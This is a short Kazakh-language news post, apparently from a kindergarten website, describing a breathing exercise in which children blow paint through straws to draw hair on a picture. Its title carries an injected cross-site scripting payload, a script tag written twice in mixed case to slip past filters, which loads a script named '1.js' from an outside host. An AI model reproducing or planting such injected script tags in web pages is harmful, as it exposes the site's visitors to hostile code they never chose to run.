таза ауада «шаш үлгісі» атты тыныс алу жаттығуы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.08.2023
Дұрыс тыныстану үшін тыныс алу бұлшық еттерін басқара білуге және жан-жақты даму қажет. Мектепке дейінгі жастағы балалардың тыныс алу жаттығуларыын жиі қолдану қажет .
«Ақбота» бөбекжайында музыка жетекшісі Шайкенова Әмемгүл Серғалиқызы ересек «Ботақан» тобымен "музыка" іс-әрекетінде таза ауада «шаш үлгісі» атты тыныс алу жаттығуын жасады. Алдын-ала сызылған баланың бейнесін жалғастыру арқылы баланың шаш үлгісін балалар өздері жасап шықты. Түрлі-түсті бояуларды түтікше арқылы мұрынмен тыныс алып, ауызбен шығарып үрлегенде шашыраған бояулар шаштың бейнесіне айналады. Балаларға қызықты, әрі денсаулықтарына пайдалы жаттығу. Ойнай отыра, баланың тыныс алу бұлшық еттері қатаяды . Балалар қызығушылық танытып, тапсырманы дұрыс орындап шықты .
Просмотров: 225